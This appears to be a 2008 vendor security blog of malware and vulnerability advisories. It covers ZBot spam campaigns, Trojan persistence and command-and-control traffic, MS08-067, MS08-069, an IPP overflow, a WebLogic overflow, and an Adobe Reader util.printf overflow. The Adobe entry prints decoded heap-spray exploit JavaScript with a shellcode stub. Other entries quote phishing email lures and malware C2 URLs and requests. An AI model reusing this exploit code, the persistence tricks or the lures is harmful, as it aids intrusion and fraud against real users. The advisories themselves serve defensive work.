Posts

UPS Invoice Spam (Nov 21, 2008)

SonicWALL UTM Research team observed a new wave of the on-going UPS invoice spam campaign starting Thursday, November 20, 2008. The email has a zip archived attachment which contains the new ZBot Trojan variant.

SonicWALL has received more than 1,000 e-mail copies of this malware till date. The e-mail looks like following:

Attachment: UPSInfo.zip (contains UPSInfo.exe)

Subject: Your Tracking # [12-digit number]

Email Body:
————————
Sorry, we were not able to deliver postal package you sent on November the 1st in time because the recipient?s address is not correct.

Please print out the invoice copy attached and collect the package at our office. If you do not receive package in ten days you will have to pay 36$ per day.

Your UPS
————————

The executable file inside the zip attachment has an icon disguised as a Adobe PDF file and it looks like following:

screenshot

The Trojan when executed performs following host level activity:

  • Creates a directory twain_32 in C:Documents and SettingsLocalServiceApplication Data and C:WINDOWSsystem32
  • Drops a copy of itself as C:WINDOWSsystem32twext.exe
  • Creates two files C:WINDOWSsystem32twain_32local.ds and C:WINDOWSsystem32twain_32user.ds

It modifies the following Registry key for running twext.exe:

  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit: “C:WINDOWSsystem32userinit.exe,C:WINDOWSsystem32twext.exe,”

It also tries connect and download an encrypted configuration file from the following URL:

  • pavelmoous.ru/pavel/conf.bin

The Trojan is also known as Trojan-Spy.Win32.Zbot.gsv [Kaspersky], W32/Trojan3.LA [F-Prot], and TR/Spy.ZBot.gsv [AntiVir]

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Zbot.GSV (Trojan) signature.

Airline Ticket Spam (Nov 14, 2008)

SonicWALL UTM Research team observed a new spam campaign starting on Thursday, November 13, 2008 which involves a fake e-mail pretending to be arriving from an Airline Company and containing Airline Ticket. The email has a zip archived attachment which contains the new Downloader Trojan.

The e-mail looks like following:

Attachment: ticket.zip (contains ticket.doc .exe)

Subject:

  • Your flight ticket
  • Your ticket from Delta Airlines
  • Your ticket from Alaska Airlines
  • Your ticket from United Airlines
  • Your airplane ticket

Email Body:
————————
Dear Holder

Thank you for using our new service “Buy flight ticket Online” on our website. Your account has been created:

Your login: your-email-address
Your password: random-string

Your credit card has been charged for $WXX.YY (where W=4 and X,Y = 0-9)
We would like to remind you that whenever you order tickets on our website you get a discount of 10%!
Attached to this message is the purchase Invoice and the flight ticket.
To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

Kind regards,
Airline Name (E.g. United, Alaska etc)
————————

The executable file inside the zip attachment has an icon disguised as a Microsoft Word document and it looks like following:

screenshot

The Trojan when executed performs following host level activity:

  • Creates a dirctory as C:Program FilesMicrosoft Common
  • Drops a copy of itself as C:Program FilesMicrosoft Commonwuauclt.exe
  • Deletes the original copy of the file
  • Creates multiple .sys files in SYSTEM32DRIVERS directory
  • Creates multiple .tmp files which later gets deleted

It creates the following Registry key for itself:

  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsexplorer.exeDebugger: “C:Program FilesMicrosoft Commonwuauclt.exe”

It also tries connect and download files from the following URLs:

  • furely.ru/load2/ld.php?v=[REMOVED]168650&n=1&uid=1 [Downloads msan1.exe – detected as GAV: Wigon.HE (Trojan)]
  • kexlup.ru/loadx/ld.php?v=[REMOVED]75168650&n=1&uid=1 [connection failed]

The Trojan is also known as Trojan.Win32.Agent.amzt [Kaspersky], W32/Trojan3.JD [F-Prot], and TR/Dldr.iBill.BP [AntiVir]

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Agent.AMZT (Trojan) signature [8,344 hits recorded].

MS08-069 MS XML Core Vulnerability (Nov 12, 2008)

Microsoft has released an advisory for its XML processing framework during this month’s Microsoft Patch Day. It is named MSXML or Microsoft XML Core services. The framework may be used by developers in third party applications as well as applications shipped with the operating system. The most popular application using this framework is Internet Explorer, which can transform XML files using XSL stylesheets.

The XML Core Services package contains the DOMDocument ActiveX object which represents the top level of the XML source. Document Type Definition (DTD) is one of several SGML and XML schema languages that DOMDocument can parse. DOMDocument includes members for retrieving and creating all other XML objects. One of those member methods, loadXML, can load an XML document using the supplied string. The supplied string can contain external DTD, which resides in a separate document and is referred by the URI of the DTD file.

An information disclosure vulnerability exists in the DOMDocument ActiveX object control implementation. The flaw is due to a design weakness in the way XML core service handles error checks for external DTDs. Normally, one domain cannot access other different domains for information. However, the vulnerable versions of MSXML allow parameter entities in external DTDs to reference data on a different domain. A successful exploitation would disclose cross-domain potential confidential information to the attacker.

To protect SonicWALL customers from being attacked by any attacks addressing this vulnerability, the SonicWALL UTM team has created and released the following IPS signatures at the same day as the advisory was released.

  • 1210 MS XML Core Services parseError Info Disclosure Attempt 2 (MS08-069)
  • 1209 MS XML Core Services parseError Info Disclosure Attempt 1 (MS08-069)

Adobe Reader util.printf Buffer Overflow (Nov 7, 2008)

Adobe Reader (formerly Acrobat Reader) is a ubiquitous application for viewing PDF (Portable Document Format) documents.

Since version 4.0, Acrobat includes JavaScript functionality allowing for customization and extensibility. Acrobat JavaScript is an extension of the core JavaScript which adds Acrobat-specific classes that enable the author to manage document related tasks. These classes include app, dbg, console, SOAP, ADBC, util, etc.

The util object provides the printf method which takes as argument, a format string specifier and values to be formatted; then it returns the corresponding formatted string. For example:

   var num = 12345
   util.printf(“%.2f”, num)

We get 12345.00.

There exists a stack buffer overflow in Adobe Reader when parsing specially crafted PDF files. Specifically, the vulnerability is caused due to a boundary error when parsing format strings containing a floating point specifier in the “util.printf()” JavaScript function. If the format string contains specific width for a floating point number, the code will copy the padding spaces (0x20) to a stack-allocated buffer with fixed length. Supplying an overly large width will overflow the buffer with spaces and overwrite SEH. For Example:

   var num = 1.2
   util.printf(“%5000f”, num)

This causes the byte 0x20 to be copied 5000 times on the stack and overflows the buffer.

An attacker can exploit this vulnerability by enticing a user to open a PDF document, which contains a malformed floating point specifier in the “util.printf()” JavaScript function. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged in user. Code injection that does not result in execution would terminate the application due to memory corruption.

To evade the detection of the attack an attacker might use obfuscate techniques. For example, one of the PDF files exploiting this vulnerability contains the following FlateDecode stream:

x48x89xACx57x6Dx8Bx14x31x0CxFEx2ExF8x27x0Ex06xEE
x10x64xB6x69xD3x19xFCxE4xEEx9ExFFx43x8Ex05x05xF1
xC4x53x7FxBFx4DxFAx96xA4x5DxCFx13x61x76xE8xA6xE9
xD3xE4xC9x4Bx3Bx97x5Fx1FxBFxDCxFExFCx7Ax79x7AxF8
xF8xEDx72x7Bx73xF3xE6x66x49xBFx88x0Bx1Ex78xE0x16
[…truncated]
xE3xC3xEDx8FxEFx3Fx2Fx77xEFx7Ex0Bx30x00xDAxDAxDC
xBB

Which would be decoded as:

function main() {

var sccs = unescape(“%u03eb%ueb59%ue805%ufff8[…truncated]“);

var bgbl = unescape(“%u0A0A%u0A0A”);
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length – slspc);
while(blk.length + slspc < 0x60000) blk = blk + blk + fblk; var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs } var nm = 12;
for(i = 0; i < 18; i++){ nm = nm + "9"; }
for(i = 0; i < 276; i++){ nm = nm + "8"; } util.printf(“%45000f”, nm); this.closeDoc(true);
}

app.setTimeOut(“main()”, 5000);

SonicWALL Gateway AntiVirus provides protection against this vulnerability via GAV: PDF.util.printf.AS (Exploit) and PDF.util.printf.AS_2 (Exploit) signatures.

Obama Speech Trojan (Nov 5, 2008)

SonicWALL UTM Research team observed a new spam campaign which uses yesterday’s US election as a social engineering mechanism to install a Trojan.

The email appears to be from news@bbc.com with the subject “Priorities for the New President”. The email contents is

——————
Barack Obama Elected 44th President of United States

Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5!

Proceed to the election results news page>>

2008 American Government Official Website
This site delivers information about current U.S. Foreign policy and about American life and culture.
—————

Some other subjects used are:

  • Barack Obama wins
  • Can Obama win popular vote but lose election?
  • Did Obama Win Yet?
  • Election 2008: Time lapse of U.S. counties
  • Election Center 2008 – Election Results
  • Election Night Results
  • Fear of a Black President
  • Obama win an Electoral College majority
  • Obama win Defined by Race
  • USA Election 2008 Results
  • World Welcomes Obama’s Win

Link goes to one of these fast-fluxed domains (bfiinwach.com, gerimumsoe.com, lopbiuemis.com,vcoenutrmsi.com, wconlinenrue.com)

If the link is clicked a Adobe_flash9.exe is served to the user. It is 31,232 bytes in size and is compressed by ASPACK executable packer. It drops itself in %Windir%9129837.exe and drops a rootkit in %Windir%new_drv.sys, which it installs as a new kernel-mode driver.

It also modifies the registry:

 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] ttool = "%Windir%9129837.exe" 

so that 9129837.exe runs every time Windows starts

Trojan then connects to HTTP on 91.203.93.57 (which is hosted in Ukraine) and issues the following GET requests:

  • cgi-bin/options.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000
  • cgi-bin/cmd.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000

It is exfiltrating stolden userids and passwords to the above IP.

The Trojan is also known as TrojanSpy:Win32/Ursnif.gen!D (Micorosft) and Mal/Heuri-E (Sophos).

SonicWALL has released a GAV signature to protect against this threat: GAV: Games.C (Trojan)

WebLogic Apache Connector Vulnerability (Oct 30, 2008)

Oracle BEA WebLogic Server is a multi-tier Java Application Server platform. In a two and three-tier application architecture, a web server is used to receive forms or HTTP requests, then pass them to application servers, which perform actual processing. A connector software refers to the component used by web server to communicate with the application server. Oracle BEA WebLogic Server ships with a connector, named mod_wl, for Apache HTTP server.

Normally an HTTP POST request is sent in one stream, unless the HTTP header Transfer-Encoding is specified. A common value of the Transfer-Encoding header is “chunked”.

There exists a buffer overflow vulnerability in Oracle BEA WebLogic Server’s connector software for Apache HTTP server. Specifically, the vulnerability is due to improper parsing of HTTP Transfer-Encoding headers sent to the Apache Web server. When a Transfer-Encoding header containing unrecognized value is received, the connector software of WebLogic Server copies the header value into a stack buffer of fixed size using a sprintf() function. It has been observed that the vulnerable code does not verify the length of the string before copying it to the buffer.

A remote unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request containing overly long Transfer-Encoding value to the vulnerable WebLogic connector software. Successful exploitation would result in code injection and execution with the privileges of the service, normally “System” on Windows platform.

SonicWALL has released an IPS signature that will detect and prevent attacks targeting this vulnerability. The signature to address this vulnerability is:

  • 3596 WEB-ATTACKS Transfer-Encoding HTTP Header BO Attempt

New ZBot Trojan variant (Oct 28, 2008)

SonicWALL UTM Research team observed a new ZBot variant being spammed in the wild using Angelina Jolie video spam campaign starting on Saturday, October 25, 2008 which involves a fake e-mail message pretending to contain Angelina Jolie video. The email has a zip archived attachment which contains the new ZBot variant.

SonicWALL has received more than 10,000 e-mail copies of this malware so far. The e-mail looks like following:

Attachment: anjelina_video.zip (contains anjelina_video.exe)

Subject: New Anje1lna Jo1ie p0rn

Email Body:
————————
Anje1lna Jo1ie p0rn video, file attached, watch him
————————

Starting October 27, 2008 the spam campaign changed to “new eCard” spam which involves a fake e-mail message pretending to contain an ecard. The email has a zip archived attachment which contains the new ZBot variant.

SonicWALL has received more than 5,000 e-mail copies of this malware so far. The e-mail looks like following:

Attachment: ecard.zip (contains ecard.exe)

Subject: You have received an eCard

Email Body:
————————
Good day.

You have received an eCard
To pick up your eCard open attached file
We hope you enjoy you eCard.
Thank You!
————————

The Trojan when executed drops following malicious files in the windows system folder:

  • twain_32local.ds
  • twain_32user.ds
  • twext.exe

It modifies the following registry keys to ensure that twext.exe executes on system startup:

  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit = “(System Folder Path)userinit.exe,(System Folder Path)twext.exe,”

It also tries to connect to opokimoki.com domain and sends following HTTP request:

  • GET /los/cfn.bf

The Trojan is also known as Trojan-Spy.Win32.Zbot.fql [Kaspersky], Troj/Agent-IAZ [Sophos], and TrojanSpy:Win32/Zbot.gen!C [Microsoft]

SonicWALL Gateway AntiVirus provided proactive protection against this new Zbot variant via GAV: Zbot.FME (Trojan) signature [809,401 hits recorded starting Oct 25, 2008].

screenshot

MS08-067 Server Service Buffer Overflow (Oct 23, 2008)

A vulnerability has been reported in the Server service of most versions of Microsoft Windows. This service facilitates file, print, and named-pipe sharing over the network for Windows-based computers. These remote access facilities are often utilized for Remote Procedure Calls (RPC).

Calling RPC methods on a remote machine entails opening a named pipe as a file and accessing the RPC interface through a Universally Unique Identifier (UUID). Some Microsoft operating systems do not require authentication to access several named pipes. The srvsvc pipe is an alias to the ntsvcs named pipe and can be accessed by several other aliases. The srvsvc interface is registered with the UUID “4B324FC8-1670-01D3-1278-5A47BF6EE188”. The interface exposes a set of functions that enumerate and configure shares, sessions and other resources on the server. Two RPC functions that are provided by the SRVSVC interface are listed below:

  • NetprPathCanonicalize
  • NetprPathCompare

The function NetprPathCanonicalize, with opcode 31, normalizes a path name by converting slash characters to backslash characters and removing directory traversal sequences. Another RPC function, NetprPathCompare, with opcode 32, internally calls the NetprPathCanonicalize function to normalize path names before comparing them. Thus RPC calls to NetprPathCompare also invoke NetprPathCanonicalize.

The server side implementation of NetprPathCanonicalize RPC function is provided by the library NETAPI32.DLL. The calling syntax of this function is as follows:

long NetprPathCanonicalize(
[in] [string] [unique] wchar_t *ServerName,
[in] [string] [ref] wchar_t *PathName,
[in] long OutBufLen;
[in] [string] [ref] wchar_t *Prefix,
[in] [out] [ref] long *PathType;
[in] long PathFlags;
);

A stack buffer overflow vulnerability exists in the way the Server service processes the PathName argument to the NetprPathCanonicalize function. The affected code fails to properly handle cases where directory traversal sequences result in traversing past the root path as in the following case:

/pathpart1/../../pathpart2

In such cases, the code will internally copy the string, less the traversal sequence and the path which precedes it into a calculated destination buffer. The destination buffer for the copied string is found by searching for the first slash character which precedes the traversal sequence. Normally, this ends up as being the beginning of the source string. Such that the process of normalizing the first traversal in the above example will end up with the following string:

/../pathpart2

Since the next traversal sequence that is to be normalized is not preceded by a path, the search for the first slash character preceding this sequence will incorrectly end up at a memory location in front of the designated buffer. Such that, if a slash character happens to exist on the stack in a vulnerable location, then the source string will be copied into that location.

It has been observed that the stack can be manipulated in a favourable way by the attacker by calling the affected RPC function twice wherein the second time it is called, the copy will overwrite the designated stack buffer.

A remote attacker can exploit this vulnerability by sending specially crafted RPC requests to an affected system. Successful exploitation may result in execution of arbitrary code on the target host with System privileges. A denial of service condition may ensue in cases of unsuccessful attacks.

SonicWALL has released two signatures which will detect and block generic exploitation attempts of this vulnerability. The following IPS signatures have been deployed to address this issue:

  • 1160 – SRVSVC NetPathCanonicalize BO Attempt 1 (MS08-067)
  • 1161 – SRVSVC NetPathCanonicalize BO Attempt 2 (MS08-067)
  • 1174 – SRVSVC NetPathCanonicalize BO Attempt 3 (MS08-067)
  • 1178 – SRVSVC NetPathCanonicalize BO Attempt 4 (MS08-067)
  • 1186 – SRVSVC NetPathCanonicalize BO Exploit 1 (MS08-067)

MS08-067 exploit in wild (Oct 23, 2008)

Today SonicWALL UTM Research team received samples using the newly patched MS08-067 – Windows Server Service vulnerability. We have received at least 10 distinct copies of this exploit malware. Filenames were n[x].exe (where [x]=1 or 2 or 3).

The malware is 397,312 bytes in size. When executed, it drops following malicious file in the system folder:

  • sysmgr.dll

It starts a service as “sysmgr (System Maintenance Service)” and deletes the original copy of the malware from the folder where it was executed.

It tries to communicate with following domains over HTTP:

  • summertime.1gokurimu.com
  • doradora.atzend.com
  • perlbody.t35.com
  • 59.106.145.58

The trojan generates a URL based on the operating system and antivirus information, in the following format: IPADDRESS/test2.php?abc=A?def=B

Where A is numeric and represents an associated type of antivirus application and B is also numeric and defines the operating system. The two values vary depending on the host computer.

It also performs following registry modifications:

  • Creates key “HKLMSystemCurrentControlSetServicessysmgrParameters”.
  • Sets value “ServiceDll”=”C:WINDOWSSYSTEM32wbemsysmgr.dll” in key “HKLMSystemCurrentControlSetServicessysmgrParameters”.
  • Sets value “ServiceMain”=”ServiceMainFunc” in key “HKLMSystemCurrentControlSetServicessysmgrParameters”.
  • Creates key “HKLMSoftwareMicrosoftWindows NTCurrentVersionSvcHost”.
  • Sets value “sysmgr”=”sysmgr” in key “HKLMSoftwareMicrosoftWindows NTCurrentVersionSvcHost”.
  • Sets value “I”=”” in key “HKLMSystemCurrentControlSetServicessysmgr”.
  • Sets value “DisplayName”=”System Maintenance Service” in key “HKLMSystemCurrentControlSetServicessysmgr”.

This malware has a very low detection at the time of this writing: Win32/Gimmiv.A [Microsoft], Generic Dropper [McAfee], Mal/Generic-A [Sophos].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: MS08-067 (Exploit) signature.

SonicWALL has also released generic IPS signatures that will detect and prevent attacks targetting this vulnerability. Please to refer to MS08-067 Server Service Buffer Overflow (Oct 23, 2008) for a detailed description of the vulnerability.

MS Windows IPP Buffer Overflow (Oct 17, 2008)

The Internet Printing Protocol (IPP) is a standard network protocol for managing remote printing. IPP is built on HTTP/1.1 and supports access control, encryption and authentication. The Microsoft IPP implementation consists of an ISAPI extension for Internet Information Service (IIS). Client hosts send IPP requests to the MS IPP service by accessing the “/printers” HTTP directory through IIS. The server replies to these request with an HTML page containing the list of all currently configured printers on the server. The IPP service can be used to query a specific printer on the remote host as well. The following HTTP request is shown as an example:

POST /printers/~5c~5c10~2e0~2e0~2e10~5cdummy/.printer HTTP/1.1
Content-Type: application/ipp

In the above example, the printer is instructed to send an IPP query to a remote SMB printer \10.0.0.10dummy Upon receiving such a request, the IPP service will translate it into SPOOLSS RPC request and redirect it to the given printer. Windows defines a Remote Procedure Call (RPC) interface for the server-side spooler Win32 API. This RPC interface can be accessed via the named pipe “spoolss” with UUID “12345678-1234-abcd-ef00-0123456789ab”.

To service the IPP request, the server will establish an SMB connection to the requested printer and send the IPP request translated into RPC function. The RPC reply is then translated into HTTP/IPP reply and sent back to the original requester in the same HTTP session.

One of IPP requests is the Get-Jobs request with operation-id 0x000a. This request translates into the EnumJobs RPC function, its purpose is to enumerate the list of print jobs currently managed by the chosen printer. The function’s prototype is shown below:

BOOL EnumJobs(
  HANDLE hPrinter, // handle to printer object
  DWORD FirstJob, // index of first job
  DWORD NoJobs, // number of jobs to enumerate
  DWORD Level, // information level
  LPBYTE pJob, // job information buffer
  DWORD cbBuf, // size of job information buffer
  LPDWORD pcbNeeded, // bytes received or required
  LPDWORD pcReturned // number of jobs received
);

Normally, the function is called twice. First, the caller specifies an empty buffer cbBuf=0 and the spooler replies with pcbNeeded set to the size of the buffer required to store the request. The caller will then repeat the request setting cbBuf to the required size.

A buffer overrun vulnerability exits within the IPP implementation on Windows servers running IIS. The flaw may be exploited by remote authenticated attackers by sending a crafted Get-Jobs IPP request to the target server. Specifically, the attacker will send the Get-Jobs IPP with the IP address and printer name of an attacker-controlled print server. The attacker’s print server will reply to the SMB/RPC requests from the target, waiting for the EnumJobs RPC function call. The reply from the attacker to the EnumJobs call will provide incorrect cbBuf and pcbNeeded values such that when these values are added by the vulnerable IPP server, the sum will overflow a 32-bit integer. The IPP server will allocate memory based on this sum which will be smaller than the size of the pJob string, and this buffer will be overwritten by the received pJob.

Successful exploitation of this vulnerability may allow for arbitrary code injection and execution with the privileges of the ISS server process. Code injection that does not result in execution could terminate the affected process due to memory corruption.

SonicWALL has released an IPS signature that will detect and prevent known exploits of this flaw. The following signature addresses this vulnerability:

  • 5274 – MS Windows Internet Printing Service Integer Overflow PoC (MS08-062)

This vulnerability has been assigned CVE-2008-1446 and has been described in the Microsoft security bulletin MS08-062